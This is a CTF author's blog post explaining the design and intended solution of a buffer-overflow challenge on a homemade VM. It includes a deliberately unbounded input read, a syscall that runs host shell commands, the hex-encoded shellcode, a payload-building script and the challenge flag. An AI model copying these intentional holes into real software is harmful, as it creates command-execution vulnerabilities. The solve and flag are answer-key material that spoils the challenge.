Building a PWN Challenge on My Own CPU (I swear I don't like pain)

So I had this little idea of building an entire custom CPU instruction set architecture called Rune ISA from scratch - 42-bit instructions, 24-bit registers, a full VM in Python, an assembler, and a text-based RPG called Unknown Runes as a reversing challenge for ISSessions CTF 2026. It felt like the ISA needed more, so I uh made something.

If you haven't read the last one yet, what are you doing here?? [go read that first](https://kernelmode0x0.blogspot.com/2026/03/i-made-cpu-for-ctf-challenge-ft-my.html) :P

For the diligent ones, who actually read the last one, you would know how I mentioned how after sinking all that time into building an entire ISA, assembler, and VM, it felt like such a waste to just make one challenge and be done with it.

So I expanded the narrative universe lol. Time to build a PWN challenge.

## The Scenario

I wanted the two challenges to be connected through lore, not just through the ISA. In Unknown Runes, one of the characters you can encounter is an old dark mage - a figure of immense power who's treated as this mythical, almost legendary entity in the game world. The mage path flag from Unknown Runes is `{Hack3rs_Ar3_T3chinically_Dark_Mag3s}` - 35 characters. Remember that number.

For the PWN challenge, I wrote a sequel scenario. Here's what the players would see:

> *He embraced the darkness.*
>
> *There are alawys absurd tales of powerful men shared in haze of strong liquor, but that's all they are, grand tales for entertainment. All but one, the man from Stormhaven. Within a decade he had toppled three kingdoms. Within two, the world had a new name for him.*
>
> *Then, one morning, he was simply gone. No body. No note. No throne.*
>
> *That was your great grandfather, a man who has always fascinated you, you went through all records you could find, even asked your parents but to no avail. The fire of curiousity burning within you demanded more, so you complied and set on a adventure.*
>
> *It took months of digging through every record, journal, & article out there but you finally stumbled upon something, a workshop, hidden deep within the Ashengrave forest, the old man sure knew how to keep people away from his stash.*
>
> *Today, after a week of sifting through various trinkets and research notes you found something tucked behind a false wall, a small arcane device, still humming, still waiting.*
>
> *There's a prompt. There's a question. And somewhere in the old man's machine, a legacy left behind for the right person to find.*
>
> *Answer carefully, for the old man was not known for his generosity.*

So the dark mage from Unknown Runes IS the great grandfather in A Legacy of Darkness. The "arcane device, still humming, still waiting" is the Rune ISA machine. Same universe, same architecture, different challenge. The mage flag being exactly 35 characters becomes the input buffer size in the PWN challenge. A little cross-challenge Easter egg that probably nobody would notice unless they solved both challenges and then really thought about it.

I was quite proud of how the lore tied together, honestly.

## The Data Width Mismatch Comes Back to Byte (heh, still a terrible pun ik)

Now, remember when I said in Part 1 that making the memory layout 64-bit while the data width is 24-bit was going to come back to haunt me? Yeah, this is where it happened and it bit (heh) me in the ass pretty hard.

See, the stack uses 64-bit addresses and stores 64-bit values. But the registers are 24-bit signed. So while the 24-bit signed immediate *can* be sign-extended to reach a stack address (since the stack lives at `0xFFFFFFFFFF000000`, the sign extension of a negative 24-bit value would map up there), I couldn't *rely* on that for clean exploit design. The data width and address width mismatch created all sorts of headaches when I was trying to design the buffer overflow.

Like, I'd be sitting there trying to figure out "okay so the player needs to overwrite this address, but the address is 64-bit and they can only work with 24-bit values, so how do they..." and then I'd stare at the ceiling for a while.

Remember kids: **your data width and address width should not have a mismatch.**

## The Stack Ops That Never Got Their Moment

So here's full story of my ridiculus irony. When I first started building A Legacy of Darkness, my initial instinct was "okay, classic PWN challenge, buffer overflow on the stack, overwrite the return address, redirect execution." You know, the textbook exploitation path. Every PWN player knows it, its elegant, its satisfying, it makes sense.

And I realised the ISA didn't even have stack operations yet. Like, at all. No PUSH, no POP, no CALL, no RET. The entire Unknown Runes RPG was built without them - I was just using JMP for everything and manually managing memory addresses with STOREI/LOADI when I needed to save and restore state. Absolute caveman behaviour.

So I went and built the full suite. PUSH, POP, CALL, RET, and then PUSHI (push an immediate directly), PUSHA (push all three registers at once), and POPA (pop them all back). The PUSHA/POPA pair especially felt like a godsend cause holy shit the amount of times I had to do the "save RA to memory, do thing, reload RA from memory" dance with 3 registers was driving me insane.

I even wrote a quick test for them - `stack_test.asm`, which was literally 8 lines:

```bash
MOV RB, 42
PUSH RB
MZERO RB
POP RB
PRINT_INT RB
HALT
```

Push 42, zero the register, pop it back, print it. If it prints 42, the stack works. Thorough testing methodology right there. Very scientific. Very rigorous. (It was not.)

Anyway, so I have my shiny new stack operations and I sit down to design the stack-based exploitation route aaand... I immediately run into the same mismatch problem. The stack lives at 0xFFFFFFFFFFF00000 - a 64-bit address. Each stack entry is 8 bytes wide. But my registers are 24-bit signed. The immediate field is 24 bits. You literally cannot express a stack address in a register.

Like okay, sure, a negative 24-bit immediate sign-extends to 64 bits, so *technically* certain high addresses are reachable. But I couldn't design a clean exploit path where a player would overwrite a return address on a 64-bit stack using 24-bit register values. The bit widths just don't line up. It'd be the jankiest, most fragile exploit ever, and not in the fun "CTF jank" way, in the "this is genuinely broken and unfair" way.

So I scrapped the stack exploitation route entirely. All those beautiful stack operations I just built, and the whole reason I built them - gone. Useless for the exploit.

I ended up going with a code segment buffer overflow instead, where the buffer and the overwrite target both live in the 24-bit addressable code/data region. Much cleaner, much more solvable.

But I kept all the stack ops in the ISA, cause like, I'd already built them. And they ended up being incredibly useful when I went back and updated `genJourney.py` for the RPG - the combat system uses `PUSH`/`POP` to save damage values between print calls (cause with 3 registers you literally cannot hold the damage value, the HP address, and the string address at the same time), and `prt_save()` uses `PUSHA`/`POPA` to save all registers before a print and restore them after. So they found a home eventually, just not the one I originally built them for.

## The Two New Syscalls

So stack ops weren't the only thing I added to the ISA for this challenge. I also needed two new syscalls that didn't exist in the original spec.

In Part 1, the ISA had 9 syscalls (IDs 0-8) - enough for printing, reading input, string comparisons, and random numbers. Everything the RPG needed. But for a PWN challenge, I needed players to actually be able to *do* something once they got code execution. What's the point of a buffer overflow if you can't run commands?

So I added two more:

| ID | Name | What it does |
| --- | ---- | -------------------------------------------------------------- |
| 9 | SYS | Gives information about the syscall id in `RB` |
| 10 | OS | Executes a shell command on the host system |

SYS was added as a quality-of-life thing for the players. Since they'd be reversing an unknown architecture with no documentation, having a syscall that literally tells you "here are all the syscalls you can use" felt like a fair hint to include. It's the kind of thing where if someone is poking around and happens to try syscall 9, they get rewarded with useful information. A little nudge in the right direction.

`OS` is... well, `OS` is the entire point. It takes a command string address in RB and the string length in `RC`, and just runs it on the host via `subprocess`. Intentionally dangerous, intentionally powerful, and the whole reason the Docker container runs as an unprivileged `ctfuser`. This is what the exploit needs to reach - get code execution, invoke `OS` with a crafted command, and exfiltrate the flag.

The fun part is that these two syscalls only exist in the version of the VM for "A Legacy of Darkness". The Unknown Runes VM doesn't have them at all. So even if someone who solved the first challenge looked at the syscall table they knew about, they'd have no idea syscalls 9 and 10 existed in this one. Another layer of reversing.

## How The Challenge Works

The program itself is actually quite simple once you understand the ISA. Here's what Legacy.asm does:

1. Jumps to `main`
2. `main` prints some narrative text - the old dark mage talking to you, being all ominous and whatnot
3. Prints a prompt (`> `)
4. Calls `fn_read` which does something... interesting

The `fn_read` function is where the real setup happens. Before it reads any input, it creates a massive amount of stack space:

```bash
fn_read:
MZERO RC
MZERO RA
MOV RC, 8492
loop:
PUSHI 0
INC RA
POP RB
JLE RA, RC, loop
```

It loops 8,492 times pushing and popping zeros. This creates the stack frame, which is well, useless for our purposes.

But on another note, 8492 is also the port the server runs on. The keen eyed among you would have seen a pattern, and the ones with a decent memory would have a very good guess (or even recognise it if you're a autistic plane nerd lol).
Well, for the rest of you, its the 8492nd Squadron from Ace Combat 5, the ghost squadron that "doesn't exist". Felt fitting for a challenge about a dark mage that the lore treats as mythical. Another easter egg that absolutely nobody will notice, but it makes me happy.

Then it reads user input into a 35-byte buffer:

```bash
MOV RA, 4 ; READ_STR syscall
MOV RB, buffer ; buffer address
MOV RC, 35 ; max length
SYSCALL RA, RB, RC
```

The buffer sits directly in the code/data segment, and right after it is the `validate` handler:

```bash
buffer:
.DB 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
.DB 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
.DB 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
.DB 0, 0, 0, 0, 0

validate:
MZERO RA
MOVR RB, RA
SYSCALL RA, RB ; EXIT(0)
```

After `fn_read` returns, the program jumps to `validate`, which just exits cleanly. Boring. Safe.

Unless you overflow the buffer.

## The Vulnerability

The vulnerability is that `READ_STR`'s buffer overflow protection is deliberately disabled in this version of the VM. In the normal VM, `READ_STR` will only write up to the `maxLen` bytes specified in RC. In the DarkLegacy version (`util.py`), that protection is stripped. You can write past the 35-byte buffer and straight into the `validate` handler, overwriting those `EXIT` instructions with whatever you want.

## The UTF-8 woes

But there's a twist. The server wraps the socket connection in UTF-8 encoding:

```python
r = conn.makefile("r", buffering=1, encoding="utf-8", errors="replace")
w = conn.makefile("w", buffering=1, encoding="utf-8", errors="replace")
```

This means any shellcode bytes ≥ 0x80 get mangled by Python's UTF-8 decoder. If you send a byte like `0xC0`, Python sees it as the start of a multi-byte UTF-8 sequence and things go very wrong.

So the exploit shellcode has to be entirely ASCII-safe - all bytes must be < `0x80`.

I spent quite a while going back and forth trying different instruction combinations to find ones where every byte in the encoding was below 0x80. This was a genuinely fun puzzle to solve cause I had to think about what the encoded bytes would look like, not just what the instructions would do.

## The 3-Instruction Shellcode

After much pain (and a lot of scribbling hex values on paper), I landed on a 3-instruction shellcode that is entirely ASCII-safe, all 18 bytes under 0x80:

```bash
MOV RA, 11 ; encoded: 0B 00 00 40 04 00
DEC RA ; encoded: 00 00 00 40 74 00 (now RA = 10 = OS syscall)
SYSCALL RA, RB, RC ; encoded: 00 00 00 6C 7C 00
```

Let me walk through why this works cause its honestly my favourite part of the whole project.

After `fn_read` returns, the register state is: `RA` = number of bytes read (from the SYSCALL return), `RB` = buffer address (still set from before the call), `RC` = 35 (still set from before the call).

But wait, the `SYSCALL` return value overwrites `RA`. So we can't rely on `RA` being anything specific. What we CAN rely on is `RB` and `RC` - they still hold the buffer address and the buffer length from when `fn_read` set them up.

So the shellcode does:
1. `MOV RA, 11` - loads 11 into `RA`. Why not 10 directly? Because `MOV RA, 10` encodes as `0A 00 00 40 04 00` and `0x0A` is a newline character (`\n`) which would terminate the `readline()` early. So we load 11 instead.
2. `DEC RA` - decrements `RA` to 10. Now `RA` = 10 = `OS` syscall number.
3. `SYSCALL RA, RB, RC` - invokes the `OS` syscall with `RB` = buffer address and `RC` = buffer length. The `OS` syscall reads a command string from the buffer address, which is... the first 35 bytes of our payload.

So the first 35 bytes of the payload ARE the shell command, space-padded. The shellcode instructions come after byte 35, overwriting the `validate` handler. The command gets read from the payload itself.

The exploit script constructs the payload like this:

```python
cmd = "getfattr -n user.description ~/*"
cmd_padded = cmd.ljust(35, ' ') # pad to 35 bytes
shellcode = bytes([
0x0B, 0x00, 0x00, 0x40, 0x04, 0x00, # MOV RA, 11
0x00, 0x00, 0x00, 0x40, 0x74, 0x00, # DEC RA
0x00, 0x00, 0x00, 0x6C, 0x7C, 0x00, # SYSCALL RA, RB, RC
])
payload = cmd_padded.encode() + shellcode
```

I was almost jumping in joy when I verified every single byte was < `0x80`. Null bytes were fine cause the buffer isn't null-terminated and `READ_STR` reads by length not by null terminator. The only byte I had to watch out for was `0x0A` (newline) which would end the readline early.

I could have made it longer but the elegance of having a 3 instruction shellcode that fits perfectly in the 18 bytes after the buffer was just too good to pass up.

## The Flag: Hidden in xattr

Now the flag itself is hidden in an extended file attribute (xattr) on a fake SSH key file. This was actually my friend's idea - I was talking to them about the challenge and wondering if this much suffering would be enough for the players or if I should make it even worse, and well he suggested hiding the flag somewhere that wouldn't show up in a normal `ls` or `cat` or `find`.

So the flag `{0ne_Last_T3st:Little0ne}` is set as a `user.description` xattr on `/home/ctfuser/.ssh` at container runtime via the entrypoint script:

```bash
#!/bin/bash
setfattr -n user.description -v "{0ne_Last_T3st:Little0ne}" /home/ctfuser/.ssh
exec python3 -u server.py
```

Why at runtime and not build time? Because Docker's overlay2 filesystem strips extended attributes during the build process. I spent like an hour confused about why `setfattr` worked in the Dockerfile but the attribute was gone when the container started. Turns out that's just a known quirk of overlay2. Setting it in the entrypoint script at container start works perfectly.

The player needs to use `getfattr -n user.description /home/ctfuser/.ssh` (or similar) as their 35-character command to extract the flag. If they don't know about xattrs, they'd never find it. Which is the point.

![solve.py](https://blogger.googleusercontent.com/img/a/AVvXsEhw_Lxlx1eMT4e4RpEVLKyo0IWl3VBPQ257PYGCH_LMUfOqzmyi2UfWwbMaf-aSui4Qdz4eeKAQsiYNWAc-FFhgrJOBHfVgnGy3bPblTB3CLuIn4mQGoQFMN_hfTC5dstqMSaB9w6HVdjJ8pz-GJSn5nr_zBr_0ZYX0Ch29-7SOfPFp8PZKCPB1d-ooEqgJ)
*A little script I made to basically have a persistent shell and test the functionality, its running on the ctfd docker that was deployed*

## Server and Docker

The DarkLegacy server runs on port 8492 (the Ace Combat Easter egg I mentioned earlier). The Docker container is Alpine-based (lighter than the Python image used for Unknown Runes) and runs as an unprivileged `ctfuser`:

```dockerfile
RUN adduser -D ctfuser
```

The `OS` syscall in the VM drops to this user before executing commands, so even if someone gets command execution, they can't mess with the server itself or read files outside `ctfuser`'s home. Well, unless they find a privilege escalation, but that's a different CTF challenge entirely :P

## Closing Thoughts

So A Legacy of Darkness ended up being a completely different kind of suffering than Unknown Runes.

With Unknown Runes, the pain was in the sheer scale - hundreds of lines of assembly, register juggling, encrypted strings, branching narratives. The ISA itself worked fine, I just had to fight against having only 3 registers.

With A Legacy of Darkness, the pain was architectural. The 64-bit/24-bit mismatch I baked into the ISA during design - back when I thought "eh, players will never need to touch the stack directly" - came back to haunt me the moment I tried to make a stack-based exploit. I built an entire suite of stack operations, tested them, got them working perfectly, and then realised I physically could not use them for the exploit because the address widths didn't line up. That was a humbling afternoon.

But honestly? The constraint forced a more creative exploit design. A code segment buffer overflow where your shellcode overwrites the instruction handler and the payload doubles as both the command and the delivery mechanism - that's actually more interesting than a textbook stack overflow. Sometimes limitations make you build better things. Sometimes.

Things I'd do differently:

- **Match the data width and address width.** I cannot stress this enough. The 24-bit registers with 64-bit stack addresses caused real headaches. Preferably go full 24-bit addresses (smaller but consistent). I said this in Part 1 and I'll say it again here cause I really need to learn this lesson.
- **Design the exploit path BEFORE the ISA.** If I'd thought about "how will someone exploit this?" during the ISA design phase instead of after, I would have caught the address width mismatch immediately. Instead I designed the ISA for the reversing challenge and then tried to bolt on PWN capabilities later.
- **Test your challenge on someone.** I built the whole thing, wrote the exploit, verified every byte, deployed it in Docker, and then went "I hope this is solvable." I should have had someone else attempt it first. Challenge author bias is real.

If you want to look at the code, yea you suffer alone for this one: [DarkLegacy](https://github.com/PrajwalNa/CTF26/tree/main/PWN/DarkLegacy)

And if you haven't read Part 1 yet, go check it out: [Part 1: I Made a CPU for a CTF Challenge (and it almost broke me)](https://kernelmode0x0.blogspot.com/2026/03/i-made-cpu-for-ctf-challenge-ft-my.html)

Hope you enjoyed this journey through my descent into madness. Between the two posts, I think I've covered enough suffering to last atleast a couple more CTFs. Probably.

P.S.> The "alawys" typo in the challenge description was there for long enough that it is officially a feature now.

Search This Blog

Prajwal's Blog

Building a PWN Challenge on My Own CPU (I swear I don't like pain)

Comments

Post a Comment

Popular posts from this blog

I Made a CPU for a CTF Challenge (ft. my blood, sweat, and tears)

Lab: Malware Basic Analysis

Windows Shellcoding - 1 : Using WinExec

Windows Shellcoding 3 : TCP Reverse Shell using WinSock